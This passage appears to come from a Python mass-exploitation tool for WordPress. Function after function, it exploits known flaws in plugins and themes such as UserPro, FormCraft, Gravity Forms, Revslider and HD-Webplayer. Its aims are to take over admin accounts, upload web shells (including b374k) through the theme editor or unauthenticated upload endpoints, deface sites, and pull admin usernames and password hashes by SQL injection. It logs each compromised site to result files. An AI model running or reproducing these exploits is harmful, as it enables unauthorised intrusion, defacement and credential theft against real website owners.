self.Print_NotVuln('wp-mobile-detector', site)
except:
self.Print_NotVuln('wp-mobile-detector', site)
def get_WpNoncE(self, source):
try:
find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
path = find[0].strip()
return path
except:
pass
def get_WpFlag(self, source):
try:
find = re.findall('<option value="(.*?)" selected="selected">', source)
path = find[0].strip()
return path
except:
pass
def UserProExploit(self, site):
try:
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
'Accept': '*/*'}
exploit = '/?up_auto_log=true'
sess = requests.session()
admin_re_page = 'http://' + site + '/wp-admin/'
sess.get('http://' + site + exploit, timeout=10, headers=headers)
Check_login = sess.get(admin_re_page, timeout=10, headers=headers)
if '<li id="wp-admin-bar-logout">' in Check_login.text:
with open('result/AdminTakeover_results.txt', 'a') as writer:
writer.write(site + exploit + '\n')
___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
___Get_edit = admin_re_page + 'theme-editor.php'
Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
source = Get_source.text
_Wp_FlaG = self.get_WpFlag(source)
_Wp_NoncE = self.get_WpNoncE(source)
__data = {'_wpnonce': _Wp_NoncE,
'_wp_http_referer': '/wp-admin/theme-editor.php?file=search.php',
'newcontent': self.shell_code,
'action': 'update',
'file': 'search.php',
'theme': _Wp_FlaG,
'scrollto': '0',
'docs-list': '',
'submit': 'Update+File'}
sess.post(___Get_edit, data=__data, headers=headers)
shell_PaTh = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
Check_sHell = sess.get(shell_PaTh, headers=headers)
if 'wordpress_project' in Check_sHell.text:
__po = {'_upl': 'Upload'}
fil = {'file': open('Access.php', 'rb')}
requests.post(shell_PaTh, data=__po, files=fil)
shell_PaTh_DoNe = 'http://' + site + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
if 'b374k' in Got_Shell.text:
self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php")
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/Access.php" + '\n')
else:
self.Print_vuln_Shell(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php")
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + "/wp-content/themes/" + _Wp_FlaG + "/search.php" + '\n')
else:
self.Print_NotVuln('UserPro', site)
else:
self.Print_NotVuln('UserPro', site)
except:
self.Print_NotVuln('UserPro', site)
def formcraftExploit_Shell(self, site):
try:
ShellFile = {'files[]': open(self.pagelinesExploitShell, 'rb')}
Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
Check = requests.get(Exp, timeout=5)
if '"failed"' in Check.text.encode('utf-8'):
GoT = requests.post(Exp, files=ShellFile, timeout=5)
if 'new_name' in GoT.text.encode('utf-8'):
GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
+ GetIndexName[0].split('"')[0]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if CheckIndex.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.formcraftExploitIndeX(site)
else:
self.formcraftExploitIndeX(site)
else:
self.formcraftExploitIndeX(site)
else:
self.formcraftExploitIndeX(site)
except:
self.formcraftExploitIndeX(site)
def formcraftExploitIndeX(self, site):
try:
ShellFile = {'files[]': open(self.Jce_Deface_image, 'rb')}
Exp = 'http://' + site + '/wp-content/plugins/formcraft/file-upload/server/content/upload.php'
Check = requests.get(Exp, timeout=5)
if '"failed"' in Check.text.encode('utf-8'):
GoT = requests.post(Exp, files=ShellFile, timeout=5)
if 'new_name' in GoT.text.encode('utf-8'):
GetIndexName = re.findall('"new_name":"(.*)",', GoT.text.encode('utf-8'))
IndexPath = site + '/wp-content/plugins/formcraft/file-upload/server/content/files/'\
+ GetIndexName[0].split('"')[0]
CheckIndex = requests.get('http://' + IndexPath, timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(IndexPath)
with open('result/Index_results.txt', 'a') as writer:
writer.write(IndexPath + '\n')
else:
self.Print_NotVuln('formcraft', site)
else:
self.Print_NotVuln('formcraft', site)
else:
self.Print_NotVuln('formcraft', site)
except:
self.Print_NotVuln('formcraft', site)
def cherry_plugin(self, site):
try:
ShellFile = {'file': (self.pagelinesExploitShell, open(self.pagelinesExploitShell, 'rb')
, 'multipart/form-data')}
Exp = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/upload.php'
aa = requests.post(Exp, files=ShellFile, timeout=5)
Shell = 'http://' + site + '/wp-content/plugins/cherry-plugin/admin/import-export/' \
+ self.pagelinesExploitShell.split('/')[1]
GoT = requests.get(Shell, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('cherry plugin', site)
else:
self.Print_NotVuln('cherry plugin', site)
except:
self.Print_NotVuln('cherry plugin', site)
def addblockblocker(self, site):
try:
ShellFile = {'popimg': open(self.pagelinesExploitShell, 'rb')}
Exp = 'http://' + site + '/wp-admin/admin-ajax.php?action=getcountryuser&cs=2'
requests.post(Exp, files=ShellFile, timeout=5)
CheckShell = 'http://' + site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/' \
+ self.pagelinesExploitShell.split('/')[1]
GoT = requests.get(CheckShell, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Adblock Blocker', site)
else:
self.Print_NotVuln('Adblock Blocker', site)
except:
self.Print_NotVuln('Adblock Blocker', site)
def HeadWayThemeExploit(self, site):
try:
CheckTheme = requests.get('http://' + site, timeout=5)
if '/wp-content/themes/headway' in CheckTheme.text.encode('utf-8'):
ThemePath = re.findall('/wp-content/themes/(.*)/style.css', CheckTheme.text.encode('utf-8'))
ShellFile = {'Filedata': open(self.pagelinesExploitShell, 'rb')}
useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
url = "http://" + site + "/wp-content/themes/" + ThemePath[0] +\
"/library/visual-editor/lib/upload-header.php"
Check = requests.get(url, timeout=5)
if Check.status_code == 200:
GoT = requests.post(url, files=ShellFile, headers=useragent)
if GoT.status_code == 200:
Shell_URL = 'http://' + site + '/wp-content/uploads/headway/header-uploads/' +\
self.pagelinesExploitShell.split('/')[1]
requests.get(Shell_URL, timeout=5)
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Headway Theme', site)
else:
self.Print_NotVuln('Headway Theme', site)
else:
self.Print_NotVuln('Headway Theme', site)
else:
self.Print_NotVuln('Headway Theme', site)
except:
self.Print_NotVuln('Headway Theme', site)
def pagelinesExploit(self, site):
try:
FileShell = {'file': open(self.pagelinesExploitShell, 'rb')}
PostData = {'settings_upload': "settings", 'page': "pagelines"}
Useragent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
url = "http://" + site + "/wp-admin/admin-post.php"
GoT = requests.post(url, files=FileShell, data=PostData, headers=Useragent, timeout=5)
if GoT.status_code == 200:
CheckShell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Pagelines', site)
else:
self.Print_NotVuln('Pagelines', site)
except:
self.Print_NotVuln('Pagelines', site)
def wysijaExploit(self, site):
try:
FileShell = {'my-theme': open(self.MailPoetZipShell, 'rb')}
PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
'page': 'GZNeFLoZAb'}
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
if 'page=wysija_campaigns&action=themes&reload=1' in GoT.text.encode('utf-8'):
sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
CheckShell = requests.get(sh, timeout=5)
CheckIndex = requests.get(index, timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/uploads/wysija/themes/rock/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
else:
self.Print_NotVuln('wysija', site)
else:
self.Print_NotVuln('wysija', site)
except:
self.Print_NotVuln('wysija', site)
def HD_WebPlayerSqli(self, site):
try:
check = requests.get('http://' + site + '/wp-content/plugins/hd-webplayer/playlist.php', timeout=5)
if '<?xml version="' in check.text.encode('utf-8'):
Exploit = '/wp-content/plugins/hd-webplayer/playlist.php' \
'?videoid=1+union+select+1,2,concat(user_login,0x3a,user_pass)' \
',4,5,6,7,8,9,10,11+from+wp_users--'
GoT = requests.get('http://' + site + Exploit, timeout=5)
User_Pass = re.findall('<title>(.*)</title>', GoT.text.encode('utf-8'))
username = User_Pass[1].split(':')[0]
password = User_Pass[1].split(':')[1]
self.Print_Vuln('HD-Webplayer', site)
self.Print_Username_Password(username, password)
with open('result/Sqli_result.txt', 'a') as writer:
writer.write('------------------------------' + '\n' + 'Domain: ' + site + '\n' +
'Username : ' + username + '\n' + 'Password : ' + password + '\n')
else:
self.Print_NotVuln('HD-Webplayer', site)
except:
self.Print_NotVuln('HD-Webplayer', site)
def Gravity_Forms_Shell(self, site):
try:
Grav_checker = requests.get('http://' + site + '/?gf_page=upload', timeout=5)
if '"status" : "error"' in Grav_checker.text.encode('utf-8'):
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
fileDeface = {'file': open(self.gravShell, 'rb')}
post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'css.php5'}
try:
url = "http://" + site + '/?gf_page=upload'
GoT = requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
if '.php5' in GoT.text.encode('utf-8'):
CheckShell = requests.get('http://' + site + '/wp-content/_input_3_css.php5', timeout=5)
if 'Vuln!!' in CheckShell.text.encode('utf-8'):
Checkshell2 = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
if 'Vuln!!' in Checkshell2.text.encode('utf-8'):
Checkshell = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/vuln.php' + '\n')
if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Gravity_forms_Index(site)
else:
self.Gravity_forms_Index(site)
else:
self.Gravity_forms_Index(site)
else:
self.Gravity_forms_Index(site)
except Exception, e:
self.Print_NotVuln('Gravity-Forms', site)
else:
self.Print_NotVuln('Gravity Forms', site)
except:
self.Timeout(site)
def Gravity_forms_Index(self, site):
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
fileDeface = {'file': open(self.Jce_Deface_image, 'rb')}
post_data = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../', 'name': 'pwn.gif'}
post_data2 = {'field_id': '3', 'form_id': '1', 'gform_unique_id': '../../../../../', 'name': 'pwn.gif'}
try:
url = "http://" + site + '/?gf_page=upload'
requests.post(url, files=fileDeface, data=post_data, headers=UserAgent, timeout=5)
requests.post(url, files=fileDeface, data=post_data2, headers=UserAgent, timeout=5)
CheckIndex = requests.get('http://' + site + '/_input_3_pwn.gif', timeout=5)
CheckIndex2 = requests.get('http://' + site + '/wp-content/_input_3_pwn.gif', timeout=5)
if 'GIF89a' in CheckIndex.text.encode('utf-8'):
self.Print_Vuln_index(site + '/_input_3_pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/_input_3_pwn.gif' + '\n')
elif 'GIF89a' in CheckIndex2.text.encode('utf-8'):
self.Print_Vuln_index(site + '/wp-content/_input_3_pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/_input_3_pwn.gif' + '\n')
else:
self.Print_NotVuln('Gravity-Forms', site)
except Exception, e:
self.Print_NotVuln('Gravity-Forms', site)
def WP_User_Frontend(self, site):
try:
CheckVuln = requests.get('http://' + site + '/wp-admin/admin-ajax.php?action=wpuf_file_upload', timeout=5)
if 'error' in CheckVuln.text or CheckVuln.status_code == 200:
post = {}
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post['action'] = 'wpuf_file_upload'
files = {'wpuf_file': open(self.Jce_Deface_image, 'rb')}
try:
_url = 'http://' + site + "/wp-admin/admin-ajax.php"
_open = requests.post(_url, files=files, data=post, headers=UserAgent, timeout=10)
if 'image][]' in _open.text.encode('utf-8'):
_Def = site + "/wp-content/uploads/20" + self.year + "/" + self.month + "/" + self.Jce_Deface_image.split('/')[1]
Check_Deface = requests.get('http://' + _Def, timeout=5)
if 'GIF89a' in Check_Deface.text.encode('utf-8'):
self.Print_Vuln_index(_Def)
with open('result/Index_results.txt', 'a') as writer:
writer.write(_Def + '\n')
else:
self.Print_NotVuln('WP-User-Frontend', site)
else:
self.Print_NotVuln('WP-User-Frontend', site)
except:
self.Print_NotVuln('WP-User-Frontend', site)
else:
self.Print_NotVuln('WP-User-Frontend', site)
except:
self.Print_NotVuln('WP-User-Frontend', site)
def Revslider_css(self, site):
IndeXText = 'Vuln!! Patch it Now!'
ency = {'action': "revslider_ajax_action",
'client_action': "update_captions_css",
'data': "<body style='color: transparent;background-color: black'><center><h1>"
"<b style='color: white'>" + IndeXText + "<p style='color: transparent'>",
}
try:
url = "http://" + site + "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
aa = requests.post(url, data=ency, timeout=5)
if 'succesfully' in aa.text.encode('utf-8'):
deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
self.Print_Vuln_index(deface)
with open('result/Index_results.txt', 'a') as writer:
writer.write(deface + '\n')
else:
self.Print_NotVuln('Revslider', site)
except:
self.Print_NotVuln('Revslider', site)
def Revslider_SHELL(self, site):
try:
UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
Exploit = 'http://' + site + '/wp-admin/admin-ajax.php'
data = {'action': "revslider_ajax_action", 'client_action': "update_plugin"}
FileShell = {'update_file': open(self.MailPoetZipShell, 'rb')}
CheckRevslider = requests.get('http://' + site, timeout=5)
if '/wp-content/plugins/revslider/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev = requests.get('http://' + site +
'/wp-content/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/wp-content/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/Avada/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev1 = requests.get('http://' + site +
'/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev1.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/striking_r/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev2 = requests.get('http://' + site +
'/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev2.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/IncredibleWP/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev3 = requests.get('http://' + site +
'/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev3.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/ultimatum/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev4 = requests.get('http://' + site +
'/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev4.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/medicate/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev5 = requests.get('http://' + site +
'/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev5.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/medicate/script/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/centum/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev6 = requests.get('http://' + site +
'/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev6.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/centum/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/centum/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/centum/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/beach_apollo/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev7 = requests.get('http://' + site +
'/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev7.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/cuckootap/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev8 = requests.get('http://' + site +
'/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev8.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/pindol/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev9 = requests.get('http://' + site +
'/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev9.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/pindol/revslider/temp/update_extract/vuln.php' + '\n')
self.Print_Vuln_index(site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif')
with open('result/Index_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/pindol/revslider/temp/update_extract/pwn.gif' + '\n')
self.Revslider_Config(site)
else:
self.Revslider_Config(site)
elif '/wp-content/themes/designplus/' in CheckRevslider.text.encode('utf-8'):
requests.post(Exploit, files=FileShell, data=data, headers=UserAgent, timeout=5)
CheckRev10 = requests.get('http://' + site +
'/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
if 'GIF89a' in CheckRev10.text.encode('utf-8'):
ShellCheck = requests.get('http://' + site +
'/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
self.Print_vuln_Shell(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(
site + '/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
